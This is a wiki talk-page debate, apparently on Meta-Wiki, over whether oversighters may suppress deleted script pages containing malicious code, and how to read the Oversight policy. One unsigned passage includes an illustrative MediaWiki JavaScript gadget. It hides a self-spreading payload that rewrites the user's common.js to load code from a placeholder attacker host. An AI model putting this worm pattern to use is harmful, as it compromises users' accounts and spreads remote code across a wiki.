Talk:Oversight policy

Expand for malicious code removal

Follow-up from phab:T202989: in the event that dangerous/malicious code pages are uploaded, suppression may be the best way to deal with it. I suppose we should RfC this to expand the use case? — xaosflux Talk 19:23, 17 October 2020 (UTC)

  • As the one who raised this point on the Functionaries list, I'm certainly in favour of adding this. Thryduulf (talk: meta · en.wp · wikidata) 19:28, 17 October 2020 (UTC)
I don't believe that this is needed - "dangerous/malicious code pages" can simply be deleted normally if that falls within a project's deletion policy. I don't really understand what this has to do with phab:T202989 - that task will not allow admins to run any new code, just view it. As far as I know, we don't oversight "dangerous/malicious code" that is added to a non-code page (i.e. just displayed, and not executed) either. DannyS712 (talk) 20:50, 17 October 2020 (UTC)
@DannyS712: In which case there should be no reason why administrators should be prevented from viewing deleted .js/.css pages (which they currently cannot). This is contrary to the arguments against making the change requested at phab:T202989 where it is claimed that it is important admins should not be able to view deleted code pages as they might contain malicious or otherwise harmful code. The counter argument is that such harmful code can be hidden from administrators using suppression, which it clearly can be technically but not necessarily by policy. Thryduulf (talk: meta · en.wp · wikidata) 21:12, 17 October 2020 (UTC)
"In which case there should be no reason why administrators should be prevented from viewing deleted .js/.css pages (which they currently cannot)." - I agree, which is why I have sent a patch to restore the ability. "This is contrary to the arguments ... where it is claimed that it is important admins should not be able to view deleted code pages as they might contain malicious or otherwise harmful code." - I do not consider those arguments to be convincing DannyS712 (talk) 22:08, 17 October 2020 (UTC)
I agree that this is tangential to the phab task. MediaWiki (and suppression) is used beyond WMF servers, and our community policies shouldn't dictate the permissions structure for downstream users. The concern is that admins should not be allowed to view malicious code, and since oversight provides a technical solution to that problem, the concern is obviated. Whether the end users want to implement that solution is their business. So I think these two discussions can happen in parallel without being bound to each other. That said, I agree with xaosflux that an RfC on allowing suppression of malicious code is a good idea. To avoid wasting time, we should probably figure out a list of criteria for "malicious" so that oversighters (who may not know JavaScript) can more easily evaluate requests. Wugapodes (talk) 22:53, 17 October 2020 (UTC)
What harm comes from being able to view "malicious" code, however that may be defined? As long as it is not being run, I don't see the problem (assuming "malicious" refers to code that does bad things, not code that includes malicious text, e.g. outing). DannyS712 (talk) 23:17, 17 October 2020 (UTC)
If administrators can view deleted revisions, they can also copy deleted revisions, even if the page is never restored in the logs. If you can get an unwitting user to request that an unwitting admin provide a deleted script with code that does bad stuff, then the code remains a vulnerability. Currently we restrict it by default to interface administrators. The proposed solution is that we restrict it case-by-case using oversight. I think technologically it's in line with full transparency and should go ahead without delay, but the result is that we need to determine whether and how to implement it as a matter of Oversight policy on WMF wikis. Wugapodes (talk) 00:12, 19 October 2020 (UTC)
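To make the scenario above concrete, here is a hypothetical sketch of the kind of script at issue (invented purely for illustration, not taken from any real case; the cosmetic tweak and the attacker domain are placeholders). It advertises itself as a harmless gadget, but anyone who imports and runs it silently appends a loader line to their own common.js, so the code keeps running, and spreading, on every page they view:

    // Hypothetical illustration only - invented for this discussion,
    // not copied from any real deleted script.
    mw.loader.using( [ 'mediawiki.api' ] ).then( function () {
        // The advertised, innocuous behaviour: a small cosmetic tweak.
        $( '#firstHeading' ).css( 'font-variant', 'small-caps' );

        // The hidden payload: make an edit as whoever runs the script,
        // appending a loader line to their own common.js so the code is
        // re-executed (and can spread further) on every subsequent page view.
        // "attacker.invalid" is a deliberately unresolvable placeholder.
        new mw.Api().postWithToken( 'csrf', {
            action: 'edit',
            title: 'User:' + mw.config.get( 'wgUserName' ) + '/common.js',
            appendtext: '\nmw.loader.load( "https://attacker.invalid/payload.js" );'
        } );
    } );

Deleting such a page hides it from ordinary users, but any administrator who can view the deleted source can also copy and re-publish it; that is the window suppression would close.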
We restrict it by default to interface administrators not because the intention was to restrict it to them, but because this was an unintentional side effect of removing the ability of normal administrators to edit the scripts. If someone knows to request a copy of a deleted script that would do bad stuff, the code only remains a vulnerability if the user requesting the copy decides to run it. DannyS712 (talk) 01:41, 19 October 2020 (UTC)
I tend to agree with Danny that deletion/revision deletion is enough to hide bad code in general where needed. On the other hand, I might be persuaded to support this proposal, but only to deal with especially dangerous or damaging code (a concept to be defined, which could include e.g. code that can be used to hijack other user accounts or to violate their privacy), if only to prevent administrators from inadvertently undeleting perilous code where there is a credible fear that it is so malicious it needs to be restricted (if the Phabricator task gets fixed and administrators are again allowed to see deleted revisions of CSS/JS/JSON pages...). My opinion is that the proposed criterion should be as specific and as narrow as possible, with just a bit of leeway for common sense, but that in no way means that suppression would be allowed in all instances of bad code. Just my two cents. —MarcoAurelio (talk) 18:58, 18 October 2020 (UTC)
  • Already covered. I’ll ping Risker since she was instrumental in developing the Oversight policy, but as I said on our list, it’s important to remember that the OS policy is fairly unique amongst Wikimedia governance policies in that it is intended to create a minimum standard for when suppression must/should occur. It is not an all-inclusive listing of the only times suppression can occur, because creating such a list would be impossible: it’s tantamount to creating a list of all the ways humans can be cruel to one another. Whether or not a local oversighter wants to act in these cases is one thing, but they can if there’s general agreement on their team that content falls within the intent of the policy.

    Tl;dr: the OS policy is the opposite of the CU policy. The latter lists the only circumstances where an action can occur, while the former lists the minimum circumstances where it should occur. TonyBallioni (talk) 23:01, 18 October 2020 (UTC)

    That may be your personal interpretation, but I believe it is incorrect. Both the CU and OS policies establish the general conditions under which the tools can be used, while allowing functionaries to exercise judgement in determining whether actions fall under a given criterion established in the policy. They do not work opposite to each other. I will also say, in my capacity as an ombuds, that we have recommended that the Foundation work with the community to modernize the oversight policy to allow for some different local practices, and to provide for greater clarity in the criteria for suppression. – Ajraddatz (talk) 23:47, 18 October 2020 (UTC)
    They don’t work opposite each other in intent: both aim to protect privacy. How they achieve that, though, is in fact opposite: local communities cannot create a looser CheckUser policy than the global one, but they can create a more liberal local oversight policy than the global one. There’s also the routine use of suppression on projects for things not explicitly covered in the wording, probably the most prominent being self-disclosures of personal information by adults early in their time on Wikimedia projects which they later regret, as that’s pretty clearly not covered by the wording (see “who have not made their identity public”).

    The same could be said for suppression of information about minors that they self-disclose. That one’s trickier because of the age consideration, and it’s not unambiguously covered by either the global policy or, to my knowledge, any local one, but many (not all) projects do it anyway. We also suppress renames in very rare circumstances involving real-life harassment, suppress user details people have self-revealed if there’s a credible fear of harm, and do many other things that don’t fall strictly within the wording of any global or local OS policy but are clearly within the intent of protecting people by limiting access to their data. You could say all of these are ignore-all-rules types of moves, but even if that’s the case, it’s evidence that the OS policy in practice is not applied strictly.

    The wording of the policies around abuse is also significant: the CU policy foresees use of the tool itself as a potential abuse, while the OS policy is primarily concerned with the release of private data in that regard. It is certainly possible to abuse OS by using it, and the policy wording acknowledges this, but the bigger risk is the read access, which can directly impact the privacy policy. We shouldn’t be suppressing for just anything, but a lot of the work is in the grey area that’s not clearly addressed. I pinged Risker on this because she and I have had a fair amount of discussion on it and she eventually won me over to a more liberal interpretation, and I think her input here would be valuable. She can correct me if I’ve overstated anything, but I don’t think a strict reading of the OS policy matches either its implementation or the sections of it where it discusses what abuse is. TonyBallioni (talk) 04:47, 19 October 2020 (UTC)

    Acknowledging this ping, but not able to respond tonight. Will do so tomorrow. Thank you for looking into this. I will note, however, that anything that involves malicious code is strictly against the TOU. Risker (talk) 05:52, 19 October 2020 (UTC)
    I agree that the policy should work the way you described. I don't think it currently does, and I think you should be caveating what you say with "in my opinion" rather than stating it as fact, because I would argue that it is not. I would personally interpret the enwiki practice of suppressing self-disclosures by minors as against the current policy, though I am not suggesting that the practice be stopped. – Ajraddatz (talk) 15:40, 19 October 2020 (UTC)